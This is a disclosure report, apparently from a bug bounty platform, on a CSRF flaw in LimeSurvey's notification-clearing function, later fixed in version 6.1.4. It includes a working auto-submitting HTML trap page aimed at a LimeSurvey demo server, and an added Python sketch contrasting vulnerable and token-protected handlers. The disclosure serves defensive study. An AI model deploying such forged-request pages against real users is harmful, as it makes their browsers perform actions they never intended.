CSRF in the delete notification function in limesurvey/limesurvey

Valid

Reported on

Jun 26th 2023


Description

The web application is vulnerable to CSRF in the delete notification function.

Proof of Concept

Step 1: See that user demo has some notifications.

Step 2: Host an HTML trap page and send the URL to the victim:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.limesurvey.org/index.php">
      <input type="hidden" name="r" value="admin&#47;notification" />
      <input type="hidden" name="sa" value="clearAllNotifications" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

And the malicious URL:

http://burpsuite/show/2/5np4472rgaki62jd3bl8wjkuie64o8ko

Step 3: After the user clicks on the malicious URL, verify that the notifications are cleared.
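As an added illustration (not part of this report or of LimeSurvey's code), the following Python sketch places the reported behaviour beside a hardened handler: the same cookie-authenticated GET that the trap page auto-submits clears the notifications in the first and is rejected by the second, which requires POST plus a per-session synchronizer token. The request/session objects, the parameter name csrf_token and the status codes are assumptions made for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
# Constructed stand-ins for a cookie-authenticated request and its server-side session.
@dataclass
class Request:
    method: str
    params: dict  # merged query-string and form-body parameters

@dataclass
class Session:
    user: str
    notifications: list
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))

def routed_to_clear_all(req: Request) -> bool:
    """The action the PoC targets: index.php?r=admin/notification&sa=clearAllNotifications."""
    return (req.params.get("r") == "admin/notification"
            and req.params.get("sa") == "clearAllNotifications")

def clear_all_vulnerable(session: Session, req: Request) -> int:
    """Reported behaviour: any method, no token; the browser attaches the session
    cookie to the trap page's auto-submitted GET, so the notifications are cleared."""
    if not routed_to_clear_all(req):
        return 404
    session.notifications.clear()
    return 200

def clear_all_hardened(session: Session, req: Request) -> int:
    """Hardened form: POST only, and only with the per-session synchronizer token,
    compared in constant time. A cross-origin page cannot read that token."""
    if not routed_to_clear_all(req):
        return 404
    if req.method != "POST":
        return 405
    if not hmac.compare_digest(req.params.get("csrf_token", ""), session.csrf_token):
        return 403
    session.notifications.clear()
    return 200

def run_scenarios() -> dict:
    """Replay the PoC's forged GET against both handlers, then a legitimate
    token-bearing POST against the hardened one. Returns (status, remaining)."""
    forged = Request("GET", {"r": "admin/notification", "sa": "clearAllNotifications"})
    results = {}
    s = Session("demo", ["n1", "n2"])
    results["vulnerable_forged"] = (clear_all_vulnerable(s, forged), len(s.notifications))
    s = Session("demo", ["n1", "n2"])
    results["hardened_forged"] = (clear_all_hardened(s, forged), len(s.notifications))
    legit = Request("POST", {**forged.params, "csrf_token": s.csrf_token})
    results["hardened_legit"] = (clear_all_hardened(s, legit), len(s.notifications))
    return results
```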

Impact

The CSRF vulnerability could be used to trick an authenticated user into clearing all of their notifications.

We are processing your report and will contact the limesurvey team within 24 hours. 3 months ago
We have contacted a member of the limesurvey team and are waiting to hear back 3 months ago
Carsten Schmitz (Maintainer) 3 months ago:

Internal reference: #18924

Carsten Schmitz validated this vulnerability 3 months ago
tuannq2299 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carsten Schmitz marked this as fixed in 6.1.4 with commit b9622b 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Carsten Schmitz published this vulnerability 2 months ago